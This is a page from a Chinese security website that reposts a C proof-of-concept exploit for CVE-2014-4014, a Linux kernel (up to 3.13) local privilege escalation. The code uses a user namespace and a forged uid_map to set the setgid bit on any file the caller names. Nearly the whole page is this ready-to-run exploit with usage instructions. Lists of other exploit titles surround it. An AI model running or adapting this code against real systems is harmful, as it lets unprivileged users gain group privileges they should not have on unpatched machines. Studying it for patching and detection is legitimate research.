首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Linux Kernel <= 3.13 - Local Privilege Escalation PoC (gid)
来源:http://hashcrack.org 作者:Vitaly 发布时间:2014-06-23  
/**
 * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC
 *
 * Vitaly Nikolenko
 * http://hashcrack.org
 *
 * Usage: ./poc [file_path]
 
 * where file_path is the file on which you want to set the sgid bit
 */
#define _GNU_SOURCE
#include <sys/wait.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <limits.h>
#include <string.h>
#include <assert.h>
  
#define STACK_SIZE (1024 * 1024)
static char child_stack[STACK_SIZE];
  
struct args {
    int pipe_fd[2];
    char *file_path;
};
  
static int child(void *arg) {
    struct args *f_args = (struct args *)arg;
    char c;
  
    // close stdout
    close(f_args->pipe_fd[1]); 
  
    assert(read(f_args->pipe_fd[0], &c, 1) == 0);
  
    // set the setgid bit
    chmod(f_args->file_path, S_ISGID|S_IRUSR|S_IWUSR|S_IRGRP|S_IXGRP|S_IXUSR);
  
    return 0;
}
  
int main(int argc, char *argv[]) {
    int fd;
    pid_t pid;
    char mapping[1024];
    char map_file[PATH_MAX];
    struct args f_args;
  
    assert(argc == 2);
  
    f_args.file_path = argv[1];
    // create a pipe for synching the child and parent
    assert(pipe(f_args.pipe_fd) != -1);
  
    pid = clone(child, child_stack + STACK_SIZE, CLONE_NEWUSER | SIGCHLD, &f_args);
    assert(pid != -1);
  
    // get the current uid outside the namespace
    snprintf(mapping, 1024, "0 %d 1\n", getuid()); 
  
    // update uid and gid maps in the child
    snprintf(map_file, PATH_MAX, "/proc/%ld/uid_map", (long) pid);
    fd = open(map_file, O_RDWR); assert(fd != -1);
  
    assert(write(fd, mapping, strlen(mapping)) == strlen(mapping));
    close(f_args.pipe_fd[1]);
  
    assert (waitpid(pid, NULL, 0) != -1);
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·D-link DSL-2760U-E1 - Persiste
·Lunar CMS 3.3 Unauthenticated
·AlienVault OSSIM av-centerd Co
·Supermicro IPMI/BMC Cleartext
·Ericom AccessNow Server Buffer
·D-Link hedwig.cgi Buffer Overf
·docker 0.11 VMM-container Brea
·D-Link authentication.cgi Buff
·Rocket Servergraph Admin Cente
·Cogent DataHub Command Injecti
·Ubisoft Rayman Legends 1.2.103
·AlienVault OSSIM < 4.7.0 - av-
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved